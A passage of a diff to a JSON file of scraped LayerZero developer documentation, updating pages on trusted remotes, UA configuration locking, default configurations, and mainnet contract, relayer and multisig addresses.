perspective contracts should only receive messages from known contracts. Hence, contracts are securely connected by \"setting trusted remotes\" The team has produced this GitHub Repository as an example of how to automate setting trusted remotes. 40 byte Format for EVM <> EVM, A Trusted Remote is 40 bytes. It is the REMOTE contract address concatenated with the LOCAL contract address. Solana, Aptos, et al. & 32 Byte Addresses For NON-evm chains with addresses that are not 20 bytes obviously the Trusted Remotes will not be exactly 40 bytes, but we will regularly use \"40 byte\" Trusted Remotes in the nomenclature. Generate TrustedRemote Using Ethers.js // the trusted remote (or sometimes referred to as the path or pathData) // is the packed 40 bytes object of the REMOTE + LOCAL user application contract addresses let trustedRemote = hre . ethers . utils . solidityPack ( [ 'address' , 'address' ], [ remoteContract . address , localContract . address ] ) Trusted Remote Usage: The Trusted Remote is now used in a few places. Here is a list of which functions expect the trusted remote format: Function Param Is it a trusted remote? Endpoint retryPayload() _srcAddress Endpoint hasStoredPayload() _srcAddress Endpoint forceResumeReceive() _srcAddress LzApp setTrustedRemote() _path LzApp isTrustedRemote() _srcAddress lzReceive() _srcAddress Previous Receive Messages Next - EVM Guides Advanced Last modified 1d ago", "labels": [ "Documentation" ] @@ -1642,7 +1634,15 @@ { "title": "UA Configuration Lock", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/ua-custom-configuration/ua-configuration-lock", - "body": "UA Configuration Lock UA's can lock their LayerZero App configurations for full control of config changes. For UAs that want to fully control their config changes & security settings, the below sections describe how to do so. Locking UA configuration guarantees that only UA owners can change their LZ app configs; UAs that opt-in to LayerZero defaults accept LayerZero's future changes to default configurations (i.e. best practice changes to block confirmations & proof libraries etc.) There are 8 settings to fully lock your UA configuration 2 settings on the Endpoint Send Version Receive Version 6 settings on each pathway Inbound Proof Library Inbound Block Confirmations Relayer Outbound Proof Type Outbound Block Confirmations Oracle Steps for locking UA Configuration 1. Set the send version and receive version of your UA on the LayerZero Endpoint. This locks you to a core library version, currently UltraLigntNodeV2. In the event new libraries are implemented, only UA owners can upgrade their core library version. 2. Per pathway, UAs can configure up to all 6 settings and can lock each of these settings individually. For example, if a UA wants a specific Oracle but prefers the defaults for the other 5 settings, the UA only needs to set its configuration for the Oracle. UAs preferring to lock all 6 settings can easily do so. Once locked, only UA owners can make future configuration changes. We provide an interface for UA contracts to set their ILayerZeroUserApplicationConfig . We also provide code snippets here . Note: To lock any of the 6 settings for each pathway, you MUST first lock send & receive versions to a core library. EVM Guides - Previous UA Custom Configuration Next - EVM Guides Code Examples Last modified 15d ago", + "body": "UA Configuration Lock UA's can lock their LayerZero App configurations for full control of config changes. For UAs that want to fully control their config changes & security settings, the below sections describe how to do so. Locking UA configuration guarantees that only UA owners can change their LZ app configs; UAs that opt-in to LayerZero defaults accept LayerZero's future changes to default configurations (i.e. best practice changes to block confirmations & proof libraries etc.) There are 8 settings to fully lock your UA configuration 2 settings on the Endpoint Send Version Receive Version 6 settings on each pathway Inbound Proof Library Inbound Block Confirmations Relayer Outbound Proof Type Outbound Block Confirmations Oracle Steps for locking UA Configuration 1. Set the send version and receive version of your UA on the LayerZero Endpoint. This locks you to a core library version, currently UltraLigntNodeV2. In the event new libraries are implemented, only UA owners can upgrade their core library version. 2. Per pathway, UAs can configure up to all 6 settings and can lock each of these settings individually. For example, if a UA wants a specific Oracle but prefers the defaults for the other 5 settings, the UA only needs to set its configuration for the Oracle. UAs preferring to lock all 6 settings can easily do so. Once locked, only UA owners can make future configuration changes. We provide an interface for UA contracts to set their ILayerZeroUserApplicationConfig . We also provide code snippets here . Note: To lock any of the 6 settings for each pathway, you MUST first lock send & receive versions to a core library. EVM Guides - Previous UA Custom Configuration Next - EVM Guides Code Examples Last modified 1d ago", + "labels": [ + "Documentation" + ] + }, + { + "title": "EVM (Solidity) Interfaces", + "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces/evm-solidity-interfaces", + "body": "EVM (Solidity) Interfaces User Application ILayerZeroEndpoint.sol ILayerZeroReceiver.sol ILayerZeroUserApplicationConfig.sol ILayerZeroEndpointLibrary.sol ILayerZeroLibraryReceiver.sol Oracle ILayerZeroOracle.sol Relayer ILayerZeroRelayer.sol These interfaces can be found in the LayerZero GitHub : ILayerZeroValidationLibrary.sol ILayerZeroUltraLightNodeV1.sol ILayerZeroValidationLibrary.sol Technical Reference - Previous Interfaces Next ILayerZeroReceiver Last modified 21d ago", "labels": [ "Documentation" ] @@ -1650,7 +1650,7 @@ { "title": "Default Config", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/mainnet/default-config", - "body": "Default Config To simplify writing a User Application contract, LayerZero does not require any configuration. In this case, a UA sending messages will be using the system defaults. Note: Should you choose to not manually set your configuration, the Default configuration will automatically be set for your application. The Default configuration is set and owned by the LayerZero Labs Multisig and may be updated in the future. The Default Configuration Oracle: Industry TSS Oracle (Polygon, Sequoia) Relayer: LayerZero Labs Library Version (send & receive): UltraLightNodeV2.sol Outbound Proof Type: 1, MPT Outbound Confirmations: Varies per source chain, see below Inbound Proof Library: 1, MPT Inbound Confirmation: Varies per source chain, see below Sending Messages Default _adapterParams Type: Version 1 Gas Amount: 200,000 // These are the default Block Confirmations waited by LayerZero before delivering messages const defaultBlockConfs = { [ ETHEREUM ] : 15 , [ BSC ] : 20 , [ AVALANCHE ] : 12 , [ POLYGON ] : 512 , [ ARBITRUM ] : 20 , [ OPTIMISM ] : 20 , [ FANTOM ] : 5 , [ DFK ] : 10 , [ HARMONY ] : 5 , [ MOONBEAM ] : 10 , [ APTOS ] : 500000 , [ CELO ] : 5 , [ DEXALOT ] : 10 , [ KLAYTN ] : 5 , [ METIS ] : 5 , [ FUSE ] : 5 , [ GNOSIS ] : 5 , [ COREDAO ] : 21 , [ OKX ] : 2 , [ DOS ] : 2 , [ SEPOLIA ] : 10 , [ ZKSYNC ] : 20 , [ ZKPOLYGON ] : 20 , [ MOONRIVER ] : 10 , [ METER ] : 2 , [ NOVA ] : 20 , [ TENET ] : 2 , [ CANTO ] : 2 , [ KAVA ] : 2 , } Transactions originating from the above chains should be delivered after a minimum of the specified source Block Confirmations Previous UltraLightNodeV2 And NonceContract Addresses Next Multisig Wallets Last modified 2mo ago", + "body": "Default Config To simplify writing a User Application contract, LayerZero does not require any configuration. In this case, a UA sending messages will be using the system defaults. Note: Should you choose to not manually set your configuration, the Default configuration will automatically be set for your application. The Default configuration is set and owned by the LayerZero Labs Multisig and may be updated in the future. The Default Configuration Oracle: Google Cloud Oracle Relayer: LayerZero Labs Library Version (send & receive): UltraLightNodeV2.sol Outbound Proof Type: 1, MPT Outbound Confirmations: Varies per source chain, see below Inbound Proof Library: 1, MPT Inbound Confirmation: Varies per source chain, see below Sending Messages Default _adapterParams Type: Version 1 Gas Amount: 200,000 // These are the default Block Confirmations waited by LayerZero before delivering messages const defaultBlockConfs = { [ ETHEREUM ] : 15 , [ BSC ] : 20 , [ AVALANCHE ] : 12 , [ POLYGON ] : 512 , [ ARBITRUM ] : 20 , [ OPTIMISM ] : 20 , [ FANTOM ] : 5 , [ DFK ] : 10 , [ HARMONY ] : 5 , [ MOONBEAM ] : 10 , [ APTOS ] : 500000 , [ CELO ] : 5 , [ DEXALOT ] : 10 , [ KLAYTN ] : 5 , [ METIS ] : 5 , [ FUSE ] : 5 , [ GNOSIS ] : 5 , [ COREDAO ] : 21 , [ OKX ] : 2 , [ DOS ] : 2 , [ SEPOLIA ] : 10 , [ ZKSYNC ] : 20 , [ ZKPOLYGON ] : 20 , [ MOONRIVER ] : 10 , [ METER ] : 2 , [ NOVA ] : 20 , [ TENET ] : 2 , [ CANTO ] : 2 , [ KAVA ] : 2 , } Transactions originating from the above chains should be delivered after a minimum of the specified source Block Confirmations Previous UltraLightNodeV2 And NonceContract Addresses Next Multisig Wallets Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1658,7 +1658,7 @@ { "title": "LayerZero Labs Relayer.sol Addresses", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/mainnet/layerzero-labs-relayer.sol-addresses", - "body": "LayerZero Labs Relayer.sol Addresses The team operates and maintains a production Relayer for the protocol. Ethereum 0x902f09715b6303d4173037652fa7377e5b98089e BNB Chain 0xa27a2ca24dd28ce14fb5f5844b59851f03dcf182 Avalanche 0xcd2e3622d483c7dc855f72e5eafadcd577ac78b4 Polygon 0x75dc8e5f50c8221a82ca6af64af811caa983b65f Arbitrum 0x177d36dbe2271a4ddb2ad8304d82628eb921d790 Optimism 0x81e792e5a9003cc1c8bf5569a00f34b65d75b017 Fantom 0x52eea5c490fb89c7a0084b32feab854eeff07c82 DFK 0x473132bb594caef281c68718f4541f73fe14dc89 Harmony 0x7cbd185f21bef4d87310d0171ad5f740bc240e26 Dexalot 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Celo 0x15e51701f245f6d5bd0fee87bcaf55b0841451b3 Moonbeam 0xcccdd23e11f3f47c37fc0a7c3be505901912c6cc Fuse 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Gnosis 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Klaytn 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Metis 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c CoreDAO 0xfe7c30860d01e28371d40434806f4a8fcdd3a098 OKT (OKX) 0xfe7c30860d01e28371d40434806f4a8fcdd3a098 Polygon zkEVM 0xa658742d33ebd2ce2f0bdff73515aa797fd161d9 Canto 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c zkSync Era 0x9923573104957bf457a3c4df0e21c8b389dd43df Moonriver 0xe9ae261d3aff7d3fccf38fa2d612dd3897e07b2d Tenet 0xaab5a48cfc03efa9cc34a2c1aacccb84b4b770e4 Arbitrum Nova 0xa658742d33ebd2ce2f0bdff73515aa797fd161d9 Meter.io 0x442b4bef4d1df08ebbff119538318e21b3c61eb9 Base 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Linea 0xA658742d33ebd2ce2F0bdFf73515Aa797Fd161D9 Previous Mainnet Addresses Next UltraLightNodeV2 And NonceContract Addresses Last modified 23d ago", + "body": "LayerZero Labs Relayer.sol Addresses The team operates and maintains a production Relayer for the protocol. Ethereum 0x902f09715b6303d4173037652fa7377e5b98089e BNB Chain 0xa27a2ca24dd28ce14fb5f5844b59851f03dcf182 Avalanche 0xcd2e3622d483c7dc855f72e5eafadcd577ac78b4 Polygon 0x75dc8e5f50c8221a82ca6af64af811caa983b65f Arbitrum 0x177d36dbe2271a4ddb2ad8304d82628eb921d790 Optimism 0x81e792e5a9003cc1c8bf5569a00f34b65d75b017 Fantom 0x52eea5c490fb89c7a0084b32feab854eeff07c82 DFK 0x473132bb594caef281c68718f4541f73fe14dc89 Harmony 0x7cbd185f21bef4d87310d0171ad5f740bc240e26 Dexalot 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Celo 0x15e51701f245f6d5bd0fee87bcaf55b0841451b3 Moonbeam 0xcccdd23e11f3f47c37fc0a7c3be505901912c6cc Fuse 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Gnosis 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Klaytn 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Metis 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c CoreDAO 0xfe7c30860d01e28371d40434806f4a8fcdd3a098 OKT (OKX) 0xfe7c30860d01e28371d40434806f4a8fcdd3a098 Polygon zkEVM 0xa658742d33ebd2ce2f0bdff73515aa797fd161d9 Canto 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c zkSync Era 0x9923573104957bf457a3c4df0e21c8b389dd43df Moonriver 0xe9ae261d3aff7d3fccf38fa2d612dd3897e07b2d Tenet 0xaab5a48cfc03efa9cc34a2c1aacccb84b4b770e4 Arbitrum Nova 0xa658742d33ebd2ce2f0bdff73515aa797fd161d9 Meter.io 0x442b4bef4d1df08ebbff119538318e21b3c61eb9 Base 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Linea 0xA658742d33ebd2ce2F0bdFf73515Aa797Fd161D9 Previous Mainnet Addresses Next UltraLightNodeV2 And NonceContract Addresses Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1666,7 +1666,7 @@ { "title": "Multisig Wallets", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/mainnet/multisig-wallets", - "body": "Multisig Wallets Multisigs Ethereum 0xCDa8e3ADD00c95E5035617F970096118Ca2F4C92 BNB 0x8D452629c5FfCDDE407069da48c096e1F8beF22c Avalanche 0xcE958C3Fb6fbeCAA5eef1E4dAbD13418bc1ba483 Polygon 0xF1a5F92F5F89e8b539136276f827BF1648375312 Arbitrum 0xFE22f5D2755b06b9149656C5793Cb15A08d09847 Optimism 0x2458BAAbfb21aE1da11D9dD6AD4E48aB2fBF9959 Fantom 0x42A36d2E002E38805109905db20FDB7a0B9e481c Metis 0xF7715218344c32Efbf93F81C4C178B2dA0b3b12D Previous Default Config Next - Technical Reference LayerZero Interfaces Last modified 5mo ago", + "body": "Multisig Wallets Multisigs Ethereum 0xCDa8e3ADD00c95E5035617F970096118Ca2F4C92 BNB 0x8D452629c5FfCDDE407069da48c096e1F8beF22c Avalanche 0xcE958C3Fb6fbeCAA5eef1E4dAbD13418bc1ba483 Polygon 0xF1a5F92F5F89e8b539136276f827BF1648375312 Arbitrum 0xFE22f5D2755b06b9149656C5793Cb15A08d09847 Optimism 0x2458BAAbfb21aE1da11D9dD6AD4E48aB2fBF9959 Fantom 0x42A36d2E002E38805109905db20FDB7a0B9e481c Metis 0xF7715218344c32Efbf93F81C4C178B2dA0b3b12D Previous Default Config Next - Technical Reference Interfaces Last modified 6mo ago", "labels": [ "Documentation" ] @@ -1674,7 +1674,7 @@ { "title": "Mainnet Addresses", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/mainnet/supported-chain-ids", - "body": "Mainnet Addresses The omnichain contracts for sending messages Official Endpoint Addresses These are the mainnet contract addresses of the contracts on which you would call send() See testnet here to play around. Note: chainId values are not related to EVM ids. Since LayerZero will span EVM & non-EVM chains the chainId are proprietary to our Endpoints. Ethereum chainId : 101 endpoint : 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 BNB Chain chainId : 102 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Avalanche chainId : 106 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Aptos chainId : 108 endpoint : 0x54ad3d30af77b60d939ae356e6606de9a4da67583f02b962d2d3f2e481484e90 layerzero_apps: 0x43d8cad89263e6936921a0adb8d5d49f0e236c229460f01b14dca073114df2b9 Polygon chainId : 109 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Arbitrum chainId : 110 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Optimism chainId : 111 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Fantom chainId : 112 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 DFK chainId : 115 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Harmony chainId : 116 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Dexalot chainId : 118 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Celo chainId : 125 endpoint : 0x3A73033C0b1407574C76BdBAc67f126f6b4a9AA9 Moonbeam chainId : 126 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Fuse chainId : 138 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Gnosis chainId : 145 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Klaytn chainId : 150 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Metis chainId : 151 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 CoreDAO chainId : 153 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 OKT (OKX) chainId : 155 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Polygon zkEVM chainId : 158 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Canto chainId : 159 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 zkSync Era chainId : 165 endpoint : 0x9b896c0e23220469C7AE69cb4BbAE391eAa4C8da Moonriver chainId : 167 endpoint : 0x7004396C99D5690da76A7C59057C5f3A53e01704 Tenet chainId : 173 endpoint : 0x2D61DCDD36F10b22176E0433B86F74567d529aAa Arbitrum Nova chainId : 175 endpoint : 0x4EE2F9B7cf3A68966c370F3eb2C16613d3235245 Meter.io chainId : 176 endpoint : 0xa3a8e19253Ab400acDac1cB0eA36B88664D8DedF Sepolia This endpoint is connected to Ethereum, Arbitrum, Optimism only on mainnet. chainId : 161 endpoint : 0x7cacBe439EaD55fa1c22790330b12835c6884a91 Kava chainId : 177 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Linea chainId : 183 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Base chainId : 184 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Mantle chainId : 181 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Loot chainId : 197 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 MeritCircle (aka Beam) chainId : 198 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Zora chainId : 195 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Technical Reference - Previous Mainnet Next LayerZero Labs Relayer.sol Addresses Last modified 27d ago", + "body": "Mainnet Addresses The omnichain contracts for sending messages Official Endpoint Addresses These are the mainnet contract addresses of the contracts on which you would call send() See testnet here to play around. Note: chainId values are not related to EVM ids. Since LayerZero will span EVM & non-EVM chains the chainId are proprietary to our Endpoints. Ethereum chainId : 101 endpoint : 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 BNB Chain chainId : 102 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Avalanche chainId : 106 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Aptos chainId : 108 endpoint : 0x54ad3d30af77b60d939ae356e6606de9a4da67583f02b962d2d3f2e481484e90 layerzero_apps: 0x43d8cad89263e6936921a0adb8d5d49f0e236c229460f01b14dca073114df2b9 Polygon chainId : 109 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Arbitrum chainId : 110 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Optimism chainId : 111 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Fantom chainId : 112 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 DFK chainId : 115 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Harmony chainId : 116 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Dexalot chainId : 118 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Celo chainId : 125 endpoint : 0x3A73033C0b1407574C76BdBAc67f126f6b4a9AA9 Moonbeam chainId : 126 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Fuse chainId : 138 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Gnosis chainId : 145 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Klaytn chainId : 150 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Metis chainId : 151 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 CoreDAO chainId : 153 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 OKT (OKX) chainId : 155 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Polygon zkEVM chainId : 158 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Canto chainId : 159 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 zkSync Era chainId : 165 endpoint : 0x9b896c0e23220469C7AE69cb4BbAE391eAa4C8da Moonriver chainId : 167 endpoint : 0x7004396C99D5690da76A7C59057C5f3A53e01704 Tenet chainId : 173 endpoint : 0x2D61DCDD36F10b22176E0433B86F74567d529aAa Arbitrum Nova chainId : 175 endpoint : 0x4EE2F9B7cf3A68966c370F3eb2C16613d3235245 Meter.io chainId : 176 endpoint : 0xa3a8e19253Ab400acDac1cB0eA36B88664D8DedF Sepolia This endpoint is connected to Ethereum, Arbitrum, Optimism only on mainnet. chainId : 161 endpoint : 0x7cacBe439EaD55fa1c22790330b12835c6884a91 Kava chainId : 177 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Linea chainId : 183 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Base chainId : 184 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Mantle chainId : 181 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Loot chainId : 197 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 MeritCircle (aka Beam) chainId : 198 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Zora chainId : 195 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 OpBNB chainId : 202 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Astar chainId : 210 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Conflux chainId : 212 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Telos chainId : 199 endpoint : 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 Aurora chainId : 211 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Tomo chainId : 196 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Scroll chainId : 214 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Horizen EON chainId : 215 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 XPLA chainId : 216 endpoint : 0xC1b15d3B262bEeC0e3565C11C9e0F6134BdaCB36 Technical Reference - Previous Mainnet Next LayerZero Labs Relayer.sol Addresses Last modified 5d ago", "labels": [ "Documentation" ] @@ -1682,7 +1682,7 @@ { "title": "UltraLightNodeV2 And NonceContract Addresses", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/mainnet/ultralightnodev2-and-noncecontract-addresses", - "body": "UltraLightNodeV2 And NonceContract Addresses Ethereum UltraLightNodeV2.sol: 0x4d73adb72bc3dd368966edd0f0b2148401a178e2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 BNB Chain UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Avalanche UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Polygon UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Arbitrum UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Optimism UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Fantom UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Metis UltraLightNode.sol: 0x38dE71124f7a447a01D67945a51eDcE9FF491251 NonceContract.sol: 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 Base UltraLightNode.sol: 0x38dE71124f7a447a01D67945a51eDcE9FF491251 NonceContract.sol: 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 Linea UltraLightNode.sol: 0x38dE71124f7a447a01D67945a51eDcE9FF491251 NonceContract.sol: 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 Table below shows the default send and receive versions which correspond to the UltraLightNodeV2.sol. It is send/recv version 2 for earlier deployments, and 1 for more recently supported chains. UltraLightNodeV2.sol is the default send & receive version for all chains Previous LayerZero Labs Relayer.sol Addresses Next Default Config Last modified 22d ago", + "body": "UltraLightNodeV2 And NonceContract Addresses Ethereum UltraLightNodeV2.sol: 0x4d73adb72bc3dd368966edd0f0b2148401a178e2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 BNB Chain UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Avalanche UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Polygon UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Arbitrum UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Optimism UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Fantom UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Metis UltraLightNode.sol: 0x38dE71124f7a447a01D67945a51eDcE9FF491251 NonceContract.sol: 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 Base UltraLightNode.sol: 0x38dE71124f7a447a01D67945a51eDcE9FF491251 NonceContract.sol: 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 Linea UltraLightNode.sol: 0x38dE71124f7a447a01D67945a51eDcE9FF491251 NonceContract.sol: 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 Table below shows the default send and receive versions which correspond to the UltraLightNodeV2.sol. It is send/recv version 2 for earlier deployments, and 1 for more recently supported chains. UltraLightNodeV2.sol is the default send & receive version for all chains Previous LayerZero Labs Relayer.sol Addresses Next Default Config Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1698,7 +1698,7 @@ { "title": "Default Config", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/testnet/default-config", - "body": "Default Config User Applications default configuration To simplify writing a User Application contract, LayerZero does not require any configuration. In this case, a UA sending messages will be using the system defaults. The Default Configuration Oracle: Industry TSS Oracle (Polygon, Sequoia) Relayer: LayerZero Labs Library Version: 1 Outbound Proof Type: 1, MPT Outbound Confirmations: 4 Inbound Proof Library: 1, MPT Inbound Confirmation: 4 Sending messages Default _adapterParams Type: Version 1 Gas Amount: 200,000 Default Block Confirmation // These are the default amount of block confirmations waiting before delivering messages (TESTNET) const defaultBlockConfs = { [ ChainId . BSC_TESTNET ] : 5 , [ ChainId . FUJI ] : 6 , [ ChainId . MUMBAI ] : 10 , [ ChainId . FANTOM_TESTNET ] : 7 , [ ChainId . SWIMMER_TESTNET ] : 5 , [ ChainId . DFK_TESTNET ] : 1 , [ ChainId . HARMONY_TESTNET ] : 5 , [ ChainId . MOONBEAM_TESTNET ] : 3 , [ ChainId . CASTLECRUSH_TESTNET ] : 1 , [ ChainId . GOERLI ] : 3 , [ ChainId . ARBITRUM_GOERLI ] : 3 , [ ChainId . OPTIMISM_GOERLI ] : 3 , [ ChainId . INTAIN_TESTNET ] : 1 , [ ChainId . CELO_TESTNET ] : 1 , [ ChainId . FUSE_TESTNET ] : 1 , [ ChainId . APTOS_TESTNET ] : 10 , [ ChainId . DOS_TESTNET ] : 1 , [ ChainId . ZKSYNC_TESTNET ] : 10 , [ ChainId . SHRAPNEL_TESTNET ] : 1 , [ ChainId . KLAYTN_TESTNET ] : 1 , [ ChainId . METIS_TESTNET ] : 1 , [ ChainId . COREDAO_TESTNET ] : 1 , [ ChainId . GNOSIS_TESTNET ] : 1 , } Transactions originating from the above chains should be delivered after a minimum of the specified source Block Confirmations Previous Testnet Addresses Next - Technical Reference Mainnet Last modified 3mo ago", + "body": "Default Config User Applications default configuration To simplify writing a User Application contract, LayerZero does not require any configuration. In this case, a UA sending messages will be using the system defaults. The Default Configuration Oracle: Google Cloud Provider Relayer: LayerZero Labs Library Version: 1 Outbound Proof Type: 1, MPT Outbound Confirmations: 4 Inbound Proof Library: 1, MPT Inbound Confirmation: 4 Sending messages Default _adapterParams Type: Version 1 Gas Amount: 200,000 Default Block Confirmation // These are the default amount of block confirmations waiting before delivering messages (TESTNET) const defaultBlockConfs = { [ ChainId . BSC_TESTNET ] : 5 , [ ChainId . FUJI ] : 6 , [ ChainId . MUMBAI ] : 10 , [ ChainId . FANTOM_TESTNET ] : 7 , [ ChainId . SWIMMER_TESTNET ] : 5 , [ ChainId . DFK_TESTNET ] : 1 , [ ChainId . HARMONY_TESTNET ] : 5 , [ ChainId . MOONBEAM_TESTNET ] : 3 , [ ChainId . CASTLECRUSH_TESTNET ] : 1 , 